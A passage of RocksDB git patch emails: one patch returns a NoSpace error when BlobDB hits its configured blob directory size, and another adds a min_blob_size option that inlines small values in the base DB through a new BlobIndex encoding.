"key" + ToString(i); + Status s = db->Get(ReadOptions(), key, &value); + if (data.count(key) == 0) { + ASSERT_TRUE(s.IsNotFound()); + } else if (is_blob[i]) { + ASSERT_TRUE(s.IsNotSupported()); + } else { + ASSERT_OK(s); + ASSERT_EQ(data[key], value); + } + } + delete db; +} + } // namespace blob_db } // namespace rocksdb From 05d5c575ac1d57ea4a9761fe77761f640afc6695 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Wed, 25 Oct 2017 16:18:15 -0700 Subject: [PATCH 177/205] Return write error on reaching blob dir size limit Summary: I found that we continue accepting writes even when the blob db goes beyond the configured blob directory size limit. Now, we return an error for writes on reaching `blob_dir_size` limit and if `is_fifo` is set to false. (We cannot just drop any file when `is_fifo` is true.) Deleting the oldest file when `is_fifo` is true will be handled in a later PR. Closes https://github.com/facebook/rocksdb/pull/3060 Differential Revision: D6136156 Pulled By: sagar0 fbshipit-source-id: 2f11cb3f2eedfa94524fbfa2613dd64bfad7a23c --- utilities/blob_db/blob_db_impl.cc | 9 ++++++++- utilities/blob_db/blob_db_test.cc | 24 ++++++++++++++++++++++++ 2 files changed, 32 insertions(+), 1 deletion(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f6bc50cd206..d04b8746956 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1050,6 +1050,14 @@ uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry) { + auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); + if (bdb_options_.blob_dir_size > 0 && + (total_blob_space_.load() + size_put) > bdb_options_.blob_dir_size) { + if (!bdb_options_.is_fifo) { + return Status::NoSpace("Blob DB reached the maximum configured size."); + } + } + Status s; uint64_t blob_offset = 0; @@ -1073,7 +1081,6 @@ Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, // increment blob count bfile->blob_count_++; - auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); bfile->file_size_ += size_put; last_period_write_ += size_put; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index b4907eef1fd..592ee609cff 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -653,6 +653,7 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { Options options; options.env = mock_env_.get(); BlobDBOptions bdb_options; + bdb_options.is_fifo = true; bdb_options.blob_dir_size = 100; bdb_options.blob_file_size = 100; bdb_options.disable_background_tasks = true; @@ -870,6 +871,29 @@ TEST_F(BlobDBTest, MigrateFromPlainRocksDB) { delete db; } +// Test to verify that a NoSpace IOError Status is returned on reaching +// blob_dir_size limit. +TEST_F(BlobDBTest, OutOfSpace) { + // Use mock env to stop wall clock. + Options options; + options.env = mock_env_.get(); + BlobDBOptions bdb_options; + bdb_options.blob_dir_size = 150; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + + // Each stored blob has an overhead of about 42 bytes currently. + // So a small key + a 100 byte blob should take up ~150 bytes in the db. + std::string value(100, 'v'); + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 60)); + + // Putting another blob should fail as ading it would exceed the blob_dir_size + // limit. + Status s = blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60); + ASSERT_TRUE(s.IsIOError()); + ASSERT_TRUE(s.IsNoSpace()); +} + } // namespace blob_db } // namespace rocksdb From d66bb21e180f25a3aca73abd7be16e51bcee930a Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 26 Oct 2017 12:19:43 -0700 Subject: [PATCH 178/205] Blob DB: Inline small values in base DB Summary: Adding the `min_blob_size` option to allow storing small values in base db (in LSM tree) together with the key. The goal is to improve performance for small values, while taking advantage of blob db's low write amplification for large values. Also adding expiration timestamp to blob index. It will be useful to evict stale blob indexes in base db by adding a compaction filter. I'll work on the compaction filter in future patches. See blob_index.h for the new blob index format. There are 4 cases when writing a new key: * small value w/o TTL: put in base db as normal value (i.e. ValueType::kTypeValue) * small value w/ TTL: put (type, expiration, value) to base db. * large value w/o TTL: write value to blob log and put (type, file, offset, size, compression) to base db. * large value w/TTL: write value to blob log and put (type, expiration, file, offset, size, compression) to base db. Closes https://github.com/facebook/rocksdb/pull/3066 Differential Revision: D6142115 Pulled By: yiwu-arbug fbshipit-source-id: 9526e76e19f0839310a3f5f2a43772a4ad182cd0 --- db/db_impl.cc | 2 +- include/rocksdb/utilities/debug.h | 2 + utilities/blob_db/blob_db.h | 4 + utilities/blob_db/blob_db_impl.cc | 555 ++++++++++++------------------ utilities/blob_db/blob_db_impl.h | 26 +- utilities/blob_db/blob_db_test.cc | 135 +++++++- utilities/blob_db/blob_file.cc | 5 +- utilities/blob_db/blob_index.h | 161 +++++++++ 8 files changed, 545 insertions(+), 345 deletions(-) create mode 100644 utilities/blob_db/blob_index.h diff --git a/db/db_impl.cc b/db/db_impl.cc index 8e9754320a7..0bf425afb71 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1588,7 +1588,7 @@ bool DBImpl::HasActiveSnapshotLaterThanSN(SequenceNumber sn) { if (snapshots_.empty()) { return false; } - return (snapshots_.newest()->GetSequenceNumber() > sn); + return (snapshots_.newest()->GetSequenceNumber() >= sn); } #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/debug.h b/include/rocksdb/utilities/debug.h index 3e325f69a09..bc5b9bf03d2 100644 --- a/include/rocksdb/utilities/debug.h +++ b/include/rocksdb/utilities/debug.h @@ -16,6 +16,8 @@ namespace rocksdb { // store multiple versions of a same user key due to snapshots, compaction not // happening yet, etc. struct KeyVersion { + KeyVersion() : user_key(""), value(""), sequence(0), type(0) {} + KeyVersion(const std::string& _user_key, const std::string& _value, SequenceNumber _sequence, int _type) : user_key(_user_key), value(_value), sequence(_sequence), type(_type) {} diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 67463d07b30..76ab95555a0 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -52,6 +52,10 @@ struct BlobDBOptions { // and so on uint64_t ttl_range_secs = 3600; + // The smallest value to store in blob log. Value larger than this threshold + // will be inlined in base DB together with the key. + uint64_t min_blob_size = 0; + // at what bytes will the blob files be synced to blob log. uint64_t bytes_per_sync = 0; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index d04b8746956..1b915420fe5 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -33,6 +33,7 @@ #include "util/sync_point.h" #include "util/timer_queue.h" #include "utilities/blob_db/blob_db_iterator.h" +#include "utilities/blob_db/blob_index.h" namespace { int kBlockBasedTableVersionFormat = 2; @@ -49,78 +50,8 @@ void extendTimestamps(rocksdb::blob_db::tsrange_t* ts_range, uint64_t ts) { } // end namespace namespace rocksdb { - namespace blob_db { -// BlobHandle is a pointer to the blob that is stored in the LSM -class BlobHandle { - public: - BlobHandle() - : file_number_(std::numeric_limits::max()), - offset_(std::numeric_limits::max()), - size_(std::numeric_limits::max()), - compression_(kNoCompression) {} - - uint64_t filenumber() const { return file_number_; } - void set_filenumber(uint64_t fn) { file_number_ = fn; } - - // The offset of the block in the file. - uint64_t offset() const { return offset_; } - void set_offset(uint64_t _offset) { offset_ = _offset; } - - // The size of the stored block - uint64_t size() const { return size_; } - void set_size(uint64_t _size) { size_ = _size; } - - CompressionType compression() const { return compression_; } - void set_compression(CompressionType t) { compression_ = t; } - - void EncodeTo(std::string* dst) const; - - Status DecodeFrom(const Slice& input); - - void clear(); - - private: - uint64_t file_number_; - uint64_t offset_; - uint64_t size_; - CompressionType compression_; -}; - -void BlobHandle::EncodeTo(std::string* dst) const { - // Sanity check that all fields have been set - assert(offset_ != std::numeric_limits::max()); - assert(size_ != std::numeric_limits::max()); - assert(file_number_ != std::numeric_limits::max()); - - dst->reserve(30); - PutVarint64(dst, file_number_); - PutVarint64(dst, offset_); - PutVarint64(dst, size_); - dst->push_back(static_cast(compression_)); -} - -void BlobHandle::clear() { - file_number_ = std::numeric_limits::max(); - offset_ = std::numeric_limits::max(); - size_ = std::numeric_limits::max(); - compression_ = kNoCompression; -} - -Status BlobHandle::DecodeFrom(const Slice& input) { - Slice s(input); - Slice* p = &s; - if (GetVarint64(p, &file_number_) && GetVarint64(p, &offset_) && - GetVarint64(p, &size_)) { - compression_ = static_cast(p->data()[0]); - return Status::OK(); - } else { - clear(); - return Status::Corruption("bad blob handle"); - } -} - Random blob_rgen(static_cast(time(nullptr))); void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) { @@ -149,19 +80,20 @@ void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( if (!is_new && value_type == CompactionEventListener::CompactionListenerValueType::kValue) { - BlobHandle handle; - Status s = handle.DecodeFrom(existing_value); + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(existing_value); if (s.ok()) { if (impl_->debug_level_ >= 3) - ROCKS_LOG_INFO(impl_->db_options_.info_log, - "CALLBACK COMPACTED OUT KEY: %s SN: %d " - "NEW: %d FN: %" PRIu64 " OFFSET: %" PRIu64 - " SIZE: %" PRIu64, - key.ToString().c_str(), sn, is_new, handle.filenumber(), - handle.offset(), handle.size()); - - impl_->override_vals_q_.enqueue({handle.filenumber(), key.size(), - handle.offset(), handle.size(), sn}); + ROCKS_LOG_INFO( + impl_->db_options_.info_log, + "CALLBACK COMPACTED OUT KEY: %s SN: %d " + "NEW: %d FN: %" PRIu64 " OFFSET: %" PRIu64 " SIZE: %" PRIu64, + key.ToString().c_str(), sn, is_new, blob_index.file_number(), + blob_index.offset(), blob_index.size()); + + impl_->override_vals_q_.enqueue({blob_index.file_number(), key.size(), + blob_index.offset(), blob_index.size(), + sn}); } } else { if (impl_->debug_level_ >= 3) @@ -178,7 +110,6 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, db_impl_(nullptr), env_(db_options.env), ttl_extractor_(blob_db_options.ttl_extractor.get()), - wo_set_(false), bdb_options_(blob_db_options), db_options_(db_options), env_options_(db_options), @@ -235,7 +166,6 @@ BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; } BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) : BlobDB(db), db_impl_(static_cast_with_check(db)), - wo_set_(false), bdb_options_(blob_db_options), db_options_(db->GetOptions()), env_options_(db_->GetOptions()), @@ -610,17 +540,6 @@ std::shared_ptr BlobDBImpl::CheckOrCreateWriterLocked( return writer; } -void BlobDBImpl::UpdateWriteOptions(const WriteOptions& options) { - if (!wo_set_.load(std::memory_order_relaxed)) { - // DCLP - WriteLock wl(&mutex_); - if (!wo_set_.load(std::memory_order_acquire)) { - wo_set_.store(true, std::memory_order_release); - write_options_ = options; - } - } -} - std::shared_ptr BlobDBImpl::SelectBlobFile() { uint32_t val = blob_rgen.Next(); { @@ -736,14 +655,6 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { return bfile; } -Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key, - const Slice& value) { - std::string new_value; - Slice value_slice; - uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); - return PutUntil(options, key, value_slice, expiration); -} - Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); Status s = db_->Delete(options, key); @@ -753,141 +664,94 @@ Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { return s; } -Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { - class BlobInserter : public WriteBatch::Handler { - private: - BlobDBImpl* impl_; - SequenceNumber sequence_; - WriteBatch updates_blob_; - std::shared_ptr last_file_; - bool has_put_; - std::string new_value_; - uint32_t default_cf_id_; - - public: - BlobInserter(BlobDBImpl* impl, SequenceNumber seq) - : impl_(impl), - sequence_(seq), - has_put_(false), - default_cf_id_(reinterpret_cast( - impl_->DefaultColumnFamily()) - ->cfd() - ->GetID()) {} - - SequenceNumber sequence() { return sequence_; } - - WriteBatch* updates_blob() { return &updates_blob_; } - - std::shared_ptr& last_file() { return last_file_; } - - bool has_put() { return has_put_; } - - virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value_slice) override { - if (column_family_id != default_cf_id_) { - return Status::NotSupported( - "Blob DB doesn't support non-default column family."); - } - Slice value_unc; - uint64_t expiration = - impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); - - std::shared_ptr bfile = - (expiration != kNoExpiration) - ? impl_->SelectBlobFileTTL(expiration) - : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); - if (last_file_ && last_file_ != bfile) { - return Status::NotFound("too many blob files"); - } - - if (!bfile) { - return Status::NotFound("blob file not found"); - } - - last_file_ = bfile; - has_put_ = true; - - std::string compression_output; - Slice value = impl_->GetCompressedSlice(value_unc, &compression_output); - - std::string headerbuf; - Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); - std::string index_entry; - Status s = impl_->AppendBlob(bfile, headerbuf, key, value, &index_entry); - if (!s.ok()) { - return s; - } - bfile->ExtendSequenceRange(sequence_); - sequence_++; - - if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); - } +class BlobDBImpl::BlobInserter : public WriteBatch::Handler { + private: + const WriteOptions& options_; + BlobDBImpl* blob_db_impl_; + uint32_t default_cf_id_; + SequenceNumber sequence_; + WriteBatch batch_; - return WriteBatchInternal::PutBlobIndex(&updates_blob_, column_family_id, - key, index_entry); + public: + BlobInserter(const WriteOptions& options, BlobDBImpl* blob_db_impl, + uint32_t default_cf_id, SequenceNumber seq) + : options_(options), + blob_db_impl_(blob_db_impl), + default_cf_id_(default_cf_id), + sequence_(seq) {} + + SequenceNumber sequence() { return sequence_; } + + WriteBatch* batch() { return &batch_; } + + virtual Status PutCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { + if (column_family_id != default_cf_id_) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); } + std::string new_value; + Slice value_slice; + uint64_t expiration = + blob_db_impl_->ExtractExpiration(key, value, &value_slice, &new_value); + Status s = blob_db_impl_->PutBlobValue(options_, key, value_slice, + expiration, sequence_, &batch_); + sequence_++; + return s; + } - virtual Status DeleteCF(uint32_t column_family_id, - const Slice& key) override { - if (column_family_id != default_cf_id_) { - return Status::NotSupported( - "Blob DB doesn't support non-default column family."); - } - WriteBatchInternal::Delete(&updates_blob_, column_family_id, key); - sequence_++; - return Status::OK(); + virtual Status DeleteCF(uint32_t column_family_id, + const Slice& key) override { + if (column_family_id != default_cf_id_) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); } + Status s = WriteBatchInternal::Delete(&batch_, column_family_id, key); + sequence_++; + return s; + } - virtual Status DeleteRange(uint32_t column_family_id, - const Slice& begin_key, const Slice& end_key) { - if (column_family_id != default_cf_id_) { - return Status::NotSupported( - "Blob DB doesn't support non-default column family."); - } - WriteBatchInternal::DeleteRange(&updates_blob_, column_family_id, - begin_key, end_key); - sequence_++; - return Status::OK(); + virtual Status DeleteRange(uint32_t column_family_id, const Slice& begin_key, + const Slice& end_key) { + if (column_family_id != default_cf_id_) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); } + Status s = WriteBatchInternal::DeleteRange(&batch_, column_family_id, + begin_key, end_key); + sequence_++; + return s; + } - virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { - return Status::NotSupported("Not supported operation in blob db."); - } + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { + return Status::NotSupported("Not supported operation in blob db."); + } - virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, - const Slice& /*value*/) override { - return Status::NotSupported("Not supported operation in blob db."); - } + virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, + const Slice& /*value*/) override { + return Status::NotSupported("Not supported operation in blob db."); + } - virtual void LogData(const Slice& blob) override { - updates_blob_.PutLogData(blob); - } - }; + virtual void LogData(const Slice& blob) override { batch_.PutLogData(blob); } +}; +Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { MutexLock l(&write_mutex_); - SequenceNumber current_seq = db_impl_->GetLatestSequenceNumber() + 1; - BlobInserter blob_inserter(this, current_seq); + uint32_t default_cf_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); + SequenceNumber current_seq = GetLatestSequenceNumber() + 1; + BlobInserter blob_inserter(options, this, default_cf_id, current_seq); Status s = updates->Iterate(&blob_inserter); if (!s.ok()) { return s; } - s = db_->Write(opts, blob_inserter.updates_blob()); + s = db_->Write(options, blob_inserter.batch()); if (!s.ok()) { return s; } - assert(current_seq == - WriteBatchInternal::Sequence(blob_inserter.updates_blob())); - assert(blob_inserter.sequence() == - current_seq + WriteBatchInternal::Count(blob_inserter.updates_blob())); - if (blob_inserter.has_put()) { - s = CloseBlobFileIfNeeded(blob_inserter.last_file()); - if (!s.ok()) { - return s; - } - } + assert(blob_inserter.sequence() == GetLatestSequenceNumber() + 1); // add deleted key to list of keys that have been deleted for book-keeping class DeleteBookkeeper : public WriteBatch::Handler { @@ -956,83 +820,106 @@ void BlobDBImpl::GetLiveFilesMetaData(std::vector* metadata) { } } +Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key, + const Slice& value) { + std::string new_value; + Slice value_slice; + uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); + return PutUntil(options, key, value_slice, expiration); +} + Status BlobDBImpl::PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) { uint64_t now = EpochNow(); - assert(std::numeric_limits::max() - now > ttl); - return PutUntil(options, key, value, now + ttl); -} - -Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, - std::string* compression_output) const { - if (bdb_options_.compression == kNoCompression) { - return raw; - } - CompressionType ct = bdb_options_.compression; - CompressionOptions compression_opts; - CompressBlock(raw, compression_opts, &ct, kBlockBasedTableVersionFormat, - Slice(), compression_output); - return *compression_output; + uint64_t expiration = kNoExpiration - now > ttl ? now + ttl : kNoExpiration; + return PutUntil(options, key, value, expiration); } Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, - const Slice& value_unc, uint64_t expiration) { - TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); + const Slice& value, uint64_t expiration) { MutexLock l(&write_mutex_); - UpdateWriteOptions(options); - - std::shared_ptr bfile = (expiration != kNoExpiration) - ? SelectBlobFileTTL(expiration) - : SelectBlobFile(); - - if (!bfile) return Status::NotFound("Blob file not found"); - - std::string compression_output; - Slice value = GetCompressedSlice(value_unc, &compression_output); - - std::string headerbuf; - Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); - - std::string index_entry; - Status s = AppendBlob(bfile, headerbuf, key, value, &index_entry); - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Failed to append blob to FILE: %s: KEY: %s VALSZ: %d" - " status: '%s' blob_file: '%s'", - bfile->PathName().c_str(), key.ToString().c_str(), - value.size(), s.ToString().c_str(), - bfile->DumpState().c_str()); - return s; + SequenceNumber sequence = GetLatestSequenceNumber() + 1; + WriteBatch batch; + Status s = PutBlobValue(options, key, value, expiration, sequence, &batch); + if (s.ok()) { + s = db_->Write(options, &batch); } + return s; +} - WriteBatch batch; +Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t expiration, + SequenceNumber sequence, WriteBatch* batch) { + TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Start"); + Status s; + std::string index_entry; uint32_t column_family_id = reinterpret_cast(DefaultColumnFamily())->GetID(); - s = WriteBatchInternal::PutBlobIndex(&batch, column_family_id, key, - index_entry); + if (value.size() < bdb_options_.min_blob_size) { + if (expiration == kNoExpiration) { + // Put as normal value + s = batch->Put(key, value); + } else { + // Inlined with TTL + BlobIndex::EncodeInlinedTTL(&index_entry, expiration, value); + s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key, + index_entry); + } + } else { + std::shared_ptr bfile = (expiration != kNoExpiration) + ? SelectBlobFileTTL(expiration) + : SelectBlobFile(); + if (!bfile) { + return Status::NotFound("Blob file not found"); + } - // this goes to the base db and can be expensive - if (s.ok()) { - s = db_->Write(options, &batch); - } + std::string compression_output; + Slice value_compressed = GetCompressedSlice(value, &compression_output); - if (s.ok()) { - // this is the sequence number of the write. - SequenceNumber sn = WriteBatchInternal::Sequence(&batch); - bfile->ExtendSequenceRange(sn); + std::string headerbuf; + Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration, + -1); - if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); - } + s = AppendBlob(bfile, headerbuf, key, value_compressed, expiration, + &index_entry); - s = CloseBlobFileIfNeeded(bfile); + if (s.ok()) { + bfile->ExtendSequenceRange(sequence); + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); + } + s = CloseBlobFileIfNeeded(bfile); + if (s.ok()) { + s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key, + index_entry); + } + } else { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to append blob to FILE: %s: KEY: %s VALSZ: %d" + " status: '%s' blob_file: '%s'", + bfile->PathName().c_str(), key.ToString().c_str(), + value.size(), s.ToString().c_str(), + bfile->DumpState().c_str()); + } } - TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); + TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Finish"); return s; } +Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, + std::string* compression_output) const { + if (bdb_options_.compression == kNoCompression) { + return raw; + } + CompressionType ct = bdb_options_.compression; + CompressionOptions compression_opts; + CompressBlock(raw, compression_opts, &ct, kBlockBasedTableVersionFormat, + Slice(), compression_output); + return *compression_output; +} + uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, Slice* value_slice, std::string* new_value) { @@ -1049,7 +936,8 @@ uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, - const Slice& value, std::string* index_entry) { + const Slice& value, uint64_t expiration, + std::string* index_entry) { auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); if (bdb_options_.blob_dir_size > 0 && (total_blob_space_.load() + size_put) > bdb_options_.blob_dir_size) { @@ -1086,18 +974,14 @@ Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, last_period_write_ += size_put; total_blob_space_ += size_put; - BlobHandle handle; - handle.set_filenumber(bfile->BlobFileNumber()); - handle.set_size(value.size()); - handle.set_offset(blob_offset); - handle.set_compression(bdb_options_.compression); - handle.EncodeTo(index_entry); - - if (debug_level_ >= 3) - ROCKS_LOG_INFO(db_options_.info_log, - ">Adding KEY FILE: %s: BC: %d OFFSET: %d SZ: %d", - bfile->PathName().c_str(), bfile->blob_count_.load(), - blob_offset, value.size()); + if (expiration == kNoExpiration) { + BlobIndex::EncodeBlob(index_entry, bfile->BlobFileNumber(), blob_offset, + value.size(), bdb_options_.compression); + } else { + BlobIndex::EncodeBlobTTL(index_entry, expiration, bfile->BlobFileNumber(), + blob_offset, value.size(), + bdb_options_.compression); + } return s; } @@ -1138,29 +1022,45 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, PinnableSlice* value) { assert(value != nullptr); - BlobHandle handle; - Status s = handle.DecodeFrom(index_entry); - if (!s.ok()) return s; + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(index_entry); + if (!s.ok()) { + return s; + } + if (blob_index.HasTTL() && blob_index.expiration() <= EpochNow()) { + return Status::NotFound("Key expired"); + } + if (blob_index.IsInlined()) { + // TODO(yiwu): If index_entry is a PinnableSlice, we can also pin the same + // memory buffer to avoid extra copy. + value->PinSelf(blob_index.value()); + return Status::OK(); + } + if (blob_index.size() == 0) { + value->PinSelf(""); + return Status::OK(); + } // offset has to have certain min, as we will read CRC // later from the Blob Header, which needs to be also a // valid offset. - if (handle.offset() < + if (blob_index.offset() < (BlobLogHeader::kHeaderSize + BlobLogRecord::kHeaderSize + key.size())) { if (debug_level_ >= 2) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Invalid blob handle file_number: %" PRIu64 " blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " key: %s", - handle.filenumber(), handle.offset(), handle.size(), key.data()); + ROCKS_LOG_ERROR(db_options_.info_log, + "Invalid blob index file_number: %" PRIu64 + " blob_offset: %" PRIu64 " blob_size: %" PRIu64 + " key: %s", + blob_index.file_number(), blob_index.offset(), + blob_index.size(), key.data()); } - return Status::NotFound("Blob Not Found, although found in LSM"); + return Status::NotFound("Invalid blob offset"); } std::shared_ptr bfile; { ReadLock rl(&mutex_); - auto hitr = blob_files_.find(handle.filenumber()); + auto hitr = blob_files_.find(blob_index.file_number()); // file was deleted if (hitr == blob_files_.end()) { @@ -1170,7 +1070,7 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, bfile = hitr->second; } - if (handle.size() == 0 && value != nullptr) { + if (blob_index.size() == 0 && value != nullptr) { value->PinSelf(""); return Status::OK(); } @@ -1186,19 +1086,19 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, } // allocate the buffer. This is safe in C++11 - valueptr->resize(handle.size()); + valueptr->resize(blob_index.size()); char* buffer = &(*valueptr)[0]; Slice blob_value; - s = reader->Read(handle.offset(), handle.size(), &blob_value, buffer); - if (!s.ok() || blob_value.size() != handle.size()) { + s = reader->Read(blob_index.offset(), blob_index.size(), &blob_value, buffer); + if (!s.ok() || blob_value.size() != blob_index.size()) { if (debug_level_ >= 2) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to read blob from file: %s blob_offset: %" PRIu64 " blob_size: %" PRIu64 " read: %d key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - static_cast(blob_value.size()), key.data(), - s.ToString().c_str()); + bfile->PathName().c_str(), blob_index.offset(), + blob_index.size(), static_cast(blob_value.size()), + key.data(), s.ToString().c_str()); } return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); } @@ -1208,15 +1108,15 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, std::string crc_str; crc_str.resize(sizeof(uint32_t)); char* crc_buffer = &(crc_str[0]); - s = reader->Read(handle.offset() - (key.size() + sizeof(uint32_t)), + s = reader->Read(blob_index.offset() - (key.size() + sizeof(uint32_t)), sizeof(uint32_t), &crc_slice, crc_buffer); if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) { if (debug_level_ >= 2) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to fetch blob crc file: %s blob_offset: %" PRIu64 " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - key.data(), s.ToString().c_str()); + bfile->PathName().c_str(), blob_index.offset(), + blob_index.size(), key.data(), s.ToString().c_str()); } return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); } @@ -1228,8 +1128,8 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, ROCKS_LOG_ERROR(db_options_.info_log, "Blob crc mismatch file: %s blob_offset: %" PRIu64 " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - key.data(), s.ToString().c_str()); + bfile->PathName().c_str(), blob_index.offset(), + blob_index.size(), key.data(), s.ToString().c_str()); } return Status::Corruption("Corruption. Blob CRC mismatch"); } @@ -1357,8 +1257,9 @@ bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( SequenceNumber esn = bfile->GetSNRange().first; - // this is not correct. - // you want to check that there are no snapshots in the + // TODO(yiwu): Here we should check instead if there is an active snapshot + // lies between the first sequence in the file, and the last sequence by + // the time the file finished being garbage collect. bool notok = db_impl_->HasActiveSnapshotLaterThanSN(esn); if (notok) { ROCKS_LOG_INFO(db_options_.info_log, @@ -1398,16 +1299,16 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, } bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { - BlobHandle handle; - Status s = handle.DecodeFrom(index_entry); + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_INFO(db_options_.info_log, "Could not parse lsm val in MarkBlobDeleted %s", index_entry.ToString().c_str()); return false; } - bool succ = FindFileAndEvictABlob(handle.filenumber(), key.size(), - handle.offset(), handle.size()); + bool succ = FindFileAndEvictABlob(blob_index.file_number(), key.size(), + blob_index.offset(), blob_index.size()); return succ; } @@ -1756,16 +1657,16 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, continue; } - BlobHandle handle; - s = handle.DecodeFrom(index_entry); + BlobIndex blob_index; + s = blob_index.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Error while decoding index entry: %s", s.ToString().c_str()); break; } - if (handle.filenumber() != bfptr->BlobFileNumber() || - handle.offset() != blob_offset) { + if (blob_index.file_number() != bfptr->BlobFileNumber() || + blob_index.offset() != blob_offset) { // Key has been overwritten. Drop the blob record. continue; } @@ -1842,12 +1743,9 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& 